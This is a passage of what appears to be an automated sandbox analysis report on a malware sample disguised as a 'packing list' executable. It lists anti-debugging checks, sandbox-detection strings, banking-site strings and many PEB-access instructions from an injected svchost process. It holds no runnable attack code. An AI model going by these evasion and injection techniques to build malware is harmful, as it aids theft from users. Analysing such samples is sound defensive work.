                Source: tCJ05791.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: tCJ05791.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: firefox.exe, 00000008.00000002.2827415381.0000024AE342C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@
                Source: tCJ05791.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176F3 LdrLoadDll,2_2_004176F3
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B86AAF BlockInput,0_2_00B86AAF
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B33D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B33D19
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B63920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00B63920
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4E01E LoadLibraryA,GetProcAddress,0_2_00B4E01E
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_013495F0 mov eax, dword ptr fs:[00000030h]0_2_013495F0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_0134AC30 mov eax, dword ptr fs:[00000030h]0_2_0134AC30
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_0134AC90 mov eax, dword ptr fs:[00000030h]0_2_0134AC90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
